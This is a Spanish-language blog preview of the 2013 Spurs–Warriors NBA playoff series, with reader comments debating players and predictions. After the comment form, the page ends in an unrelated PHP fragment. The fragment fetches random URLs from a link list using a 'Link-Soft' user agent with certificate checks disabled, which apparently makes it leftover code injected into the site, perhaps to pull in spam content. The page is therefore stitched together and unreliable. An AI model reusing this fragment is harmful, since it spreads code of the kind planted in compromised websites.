Previa San Antonio Spurs – Golden State Warriors

06 de May de 2013 por TheDeerHunter

Apasionante segunda semifinal la que se avecina en el oeste, como no puede ser de otra manera. Los Spurs buscan asegurar su 7ª final de conferencia de la era Popovich, los Warriors no la alcanzan desde 1976, época en la que aún ganaban títulos. Año impar, talismán para los tejanos a los que llevamos más de un lustro enterrando. Complicado que vuelvan a encontrarse en una situación tan favorable como ésta para alcanzar unas finales en las que no han perdido nunca. Un anillo más para Duncan sería de una justicia casi poética. Por el contrario, los Warriors ya han superado toda expectativa. Jugarán sin presión y con todo el descaro que les hace tan especiales y al mismo tiempo tan peligrosos. Curiosamente también han sido uno de los equipos que más se les ha atragantado a los Spurs durante la pasada regular.

Los Spurs prácticamente van a debutar en estos Playoffs pues los Lakers no sirvieron ni como sparring y no necesitaron ni un mínimo de competitividad para barrerles. Han estado obligados a permanecer inactivos durante más tiempo del deseable en un momento tan crítico de la temporada. Los Warriors, sin embargo, vienen enchufadísimos habiendo superado a los Nuggets de la forma más brillante posible, con reinvención incluida motivada por la lesión de David Lee.

Decíamos que los Warriors dieron guerra de la buena a los Spurs durante la regular. El parcial entre ellos ha sido 2 victorias y 2 derrotas, aunque por desgracia para nosotros podemos extraer pocas lecturas de los antecedentes. Por distintos motivos no han podido medir toda la artillería simultáneamente y cada choque ha sido un mundo. En cierto modo será la primera vez que se enfrentan de verdad, amén de la capacidad de ambos técnicos de sacar sus cartas de la manga y alterar la situación sobre la marcha. 

Claves de la eliminatoria

  • La experiencia es un grado: Desde Popovich a Duncan, pasando por Parker, Manudo o Bonner quedan muy pocos en esta liga con tantos recursos mentales para enfrentarse a momentos como éste. Si las piernas aguantan, y nada hace pensar lo contrario, son un rival diseñado para hacer pagar caro cada error cometido. Para la mayor parte de los Warriors ésta es la primera postemporada que disputan.
  • Defensa del perímetro: Sobra decir la amenaza que puede suponer Golden State desde más allá del arco. Desplegando small-ball todavía más. Curry y Jack ya supusieron un quebradero de cabeza en la regular pero en el estado de forma en que se encuentran es para que Popovich vaya preparando soluciones.
  • Factor X: Nadie sabe qué papel podrá desempeñar David Lee en esta serie, por otro lado tampoco está clara la versión que veremos de Andrew Bogut. Si es la de sus primeros años como llegamos a ver contra Denver, los Spurs tienen un problema.
  • Control del tempo: Los Warriors buscarán su ritmo rápido e impredecible, teniendo presente que Spurs son una escuadra veterana. No obstante no es fácil hacer que a estos se les desmadre demasiado la situación.

Pronóstico 

4-2 Spurs

Comenta

12 comentarios a esta entrada

  1. Esteban dice:
    #1

    que pronosticos dificil

    hay dos factores, si Lee esta recuperado y juega a su nivel
    y si Bogut juega como contra Denver

    pasan los Warrios 4-2

    como ambas cosas son complicadas, doy un 4-3 de spurs

      Citar

  2. Sancho88 dice:
    #2

    Hay un pedazo de duelo entre Parker y Curry que va a ser una pasada de ver. Yo creo que pasan los Spurs 4-2 también. A ver si le dan más minutos a Blair. No entiendo la manía que le tiene Popo… Ahora bien, GSW tiene equipazo. Quizá, donde no pueden competir es con la segunda línea de fuego. Ahí San Antonio te mata por la cantidad de recursos q tiene. Veremos con qué nos sorprende Popo, y, sobre todo, a ver cómo está T-Mac. Madre mía, menudo as de la manga, al estilo Stackhouse o Finley. Yo creo que va a rendir bien

      Citar

  3. Chipi dice:
    #3

    Siendo admirador absoluto de Duncan y T-Mac, nada me gustaría más que ver a los Warriors en finales de conferencia.

      Citar

  4. Denise dice:
    #4

    Sancho88:
    Veremos con qué nos sorprende Popo, y, sobre todo, a ver cómo está T-Mac. Madre mía, menudo as de la manga, al estilo Stackhouse o Finley. Yo creo que va a rendir bien

    Veremos que pasa, porque yo creo que McGrady está mas cascado que el consolador favorito de Jenna Jameson.
    Para mi la clave son algunas de ls ya comentadas.

    – El acierto en triples que tenga GSW, el cual es su termómetro para ganar o perder el partido.
    – El banquillo de Spurs vs GSW. El primero en teoría es infinitamente mejor.
    – Dominio de la pintura. Duncan aunque no lo parezca tiene 37 años y el ritmo alegre sube y baja de Warriors lo puede matar, Blair es muy poco utilizado, Splitter no me gusta como jugador, y Bonner solo es un porculero tiratriples. Y por los GSW, factor X como decís de Lee y Bogut, espero mucho de Landry el cual puede salir bien a tapar al canalla de Bonner, y a ver si Biedrins se pone el mono de trabajo y da algunos buenos minutos de calidad, que joder en 2003 era muy bueno, no se le ha podido olvidar jugar a esto.

    Y ojo, alguien se puede doctorar en esta serie, Harrison Barnes, pedazo de temporada de este animalico que para mí, si lo hace bien podría graduarse como el 2º mejor jugador de este Draft solo por detrás de Lillard (y lo meto por delante de Davis).

      Citar

  5. Denise dice:
    #5

    Ah, se me olvidó, voy con los Warriors a muerte, 2-4.

      Citar

  6. Sancho88 dice:
    #6

    ey Denise, xk no te gusta Splitter? x la serie contra OKC? a mí me parece un jugador soberbio. De hecho, junto a Scola, de lo mejorcito que ha jugado en España en cuanto a jugadores extranjeros… no sé por qué no te gusta

      Citar

  7. R1Molano dice:
    #7

    Splitter puede ser clave, tenemos suerte de q

      Citar

  8. R1Molano dice:
    #8

    Splitter puede ser clave, tenemos suerte de que este tocado, porque nos puede hacer daño el doble poste y para nosotros es ideal que jueguen Diaw y Blair y se dediquen a tirar ineficientemente a media distancia, les prefiero incluso sobre Bonner.
    A ver si Pop pone a Bonner a defender a Barnes como en el último de la RS jaja

    Lo veo complicadísimo para nosotros, pero si aparece el mejor Bogut y minimiza a Duncan (terror, mucho terror me da este) empezare a ver un buen % de posibilidades.

      Citar

  9. Denise dice:
    #9

    Sancho88:
    ey Denise, xk no te gusta Splitter? x la serie contra OKC? a mí me parece un jugador soberbio. De hecho, junto a Scola, de lo mejorcito que ha jugado en España en cuanto a jugadores extranjeros… no sé por qué no te gusta

    Claro, en Europa era la hostia. Ahí está la cuestión. Un jugador que dominaba el Viejo Continente y con tantos recursos ofensivos, en mi opinión no está demostrando demasiado en su etapa en los Spurs para todo el potencial que se le supone. Es más, creo que lo está haciendo mejor en defensa donde por su físico tenía mis dudas que en ataque donde esperaba mucho más de él.
    De lo más reciente que he visto, ví 3 de los 4 partidos de Spurs vs Lakers y en esta serie ni ha aparecido, y vale que en teoría se enfrentaba a Pau y a Howard, pero en realidad hubo muchos minutos de la basura y de poca intensidad y ni en esas se le vio.
    Por ponerte un ejemplo, es que un Vucevic, Valanciunas ó un Kanter que llevan “dos días” jugando a ésto en mi opinión, teniendo en cuenta sus curriculum, ya han demostrado más en la NBA que un tío como el brasileño que ha sido MVP de la temporada, de finales, de supercopa, de Euroliga..y en definitiva ha dominado a su antojo las zonas del otro lado del charco.

      Citar

  10. Denise dice:
    #10

    A todo esto, quizas lo sepais, pero yo me acabó de enterar…
    Los Warriors se mudan a San Francisco en 2017. El ambiente del Oracle es cojonudo, espero que en el nuevo pabellón sea igual..

      Citar

  11. Esteban dice:
    #11

    Denise:
    A todo esto, quizas lo sepais, pero yo me acabó de enterar…
    Los Warriors se mudan a San Francisco en 2017. El ambiente del Oracle es cojonudo, espero que en el nuevo pabellón sea igual..

    no se hasta q punto esta confirmado, cuando compraron estos dueños hizo mucho ruido que se mudaban pero en el ultimo añop `practicamente no se ha repetido

    la verdad no se en que esta, pero el ambiente en golden state vale la pena que se mantenga

      Citar

  12. Sempren dice:
    #12

    Pues la verdad es que yo no veo tales motivos para el optimismo con los Warriors. No sé cómo estará Lee, si estuviera bien sí podrá ser competido, pero sino a Barnes le tocaría pelear contra Duncan o Splitter, mayormente.
    Bogut tuvo momentos buenos, pero en el 5º partido en Denver ni siquiera jugó en el último cuarto, o apenas lo hizo.
    Por otra parte, una de las claves que se dan es la defensa del perímetro. Creo que con tíos como Kawhi Leonard o Green tienen buena parte del camino recorrido.

    Y sí es cierto que el desequilibrio en la posición de 4 también le puede hacer daño a los Spurs, pero tienen un sexto hombre como Ginobili que igualaría las cosas con Jarret Jack, desplazando a Leonard a la posición de 4.
    Vamos, que Golden State es un equipo peligrosísimo, pero miro a los Spurs y veo que tienen armas para contrarrestar casi todas las facetas de su juego, más algunas otras alternativas en los puestos interiores.
    Solo la magia de Curry…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>